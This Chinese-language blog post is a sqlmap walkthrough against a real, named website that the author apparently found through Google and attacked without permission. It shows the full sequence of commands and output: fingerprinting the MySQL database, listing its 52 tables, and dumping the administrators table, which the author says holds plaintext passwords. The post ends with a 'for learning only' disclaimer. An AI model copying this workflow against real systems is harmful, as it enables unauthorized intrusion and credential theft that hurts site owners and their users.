欢迎各位来投稿,投稿邮箱 admin@veimx.com 欢迎各位爱好PHP,linux的朋友们加入我们

使用sqlmap实战渗透测试

安全检测 spade 351℃

今天来介绍我们的主角 sqlmap 官网地址 : http://sqlmap.org/

20170413181054

 

首先我们Google来找下存在疑似sql注入的站点,我找到如下站点:www.bible-history.com

20170413175730

存在注入的URL为:www.bible-history.com/subcat.php?id=2

现在开始我们的主角sqlmap

[root@spade ~]# sqlmap -u 'www.bible-history.com/subcat.php?id=2' -b --current-db --current-user

20170413175943

提示我们数据库是mysql版本号为5.5.51 当前使用的用户是 bho@localhost 数据库是 bible_history

接下来我们来看看当前数据库下有哪些表

[root@spade ~]# sqlmap -u 'www.bible-history.com/subcat.php?id=2' -D bible_history --tables
[18:01:57] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.25, PHP 5.5.38
back-end DBMS: MySQL >= 5.0
[18:01:57] [INFO] fetching tables for database: 'bible_history'
Database: bible_history
[52 tables]
+-----------------------------+
| Emails |
| administrators |
| bh_addform |
| bh_guestbook |
| bho_board_bans |
| bho_board_forums |
| bho_board_posts |
| bho_board_search |
| bho_board_topics |
| bho_board_users |
| bible_book |
| books |
| cat |
| categories |
| chapters |
| chapters1 |
| commentary_jfb |
| eastons |
| guestbook |
| isbe |
| kingjames |
| kjv_verse |
| links |
| mathew |
| naves |
| naves_phrase |
| naves_verse |
| ob_book_abbreviation_lookup |
| outline_chapter |
| outline_major_section |
| questions |
| series |
| smiths |
| smiths_ref |
| sub |
| subjects |
| tbl_dictionary |
| tbl_fausset |
| tbl_gfd |
| tbl_hitchcock |
| tbl_hollman |
| tbl_ibhcategory |
| tbl_ibhsubcategory |
| tbl_image |
| tbl_isbe |
| tbl_sdas |
| tbl_the |
| tbl_tt |
| tbl_vcx |
| user_links |
| web_verse |
| web_verse_bak |
+-----------------------------+

[18:01:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bible-history.com'

[*] shutting down at 18:01:58

存在的表还是挺多的哈!!! 我们找到管理员的表 administrators 并且进去看看有什么好玩的!!!

[root@spade ~]# sqlmap -u 'www.bible-history.com/subcat.php?id=2' -D bible_history -T administrators --columns 

20170413180437

里面有 用户名 账号 密码 等字段 ,,,,接下来我们都看看里面是什么吧!

[root@spade ~]# sqlmap -u 'www.bible-history.com/subcat.php?id=2' -D bible_history -T administrators -C admin_id,admin_first_name,admin_last_name,admin_password,admin_username --dump

20170413180703

爆出了管理员的账号和密码 最重要的是还是明文的,,,可想而知这开发人员有多么得懒啊!由于时间关系 我就不在接着演示了。大家看了以后仅供学习参考,请勿用于非法途径,谢谢!大牛请勿喷。。

提示:以上检测均属原创,转载请注明来自于 巴蜀风博客 https://www.veimx.com

 

 

 

 

 

 



转载请注明:巴蜀风博客-个人爱好博客-你的私人博客 » 使用sqlmap实战渗透测试

喜欢 (1)or分享 (0)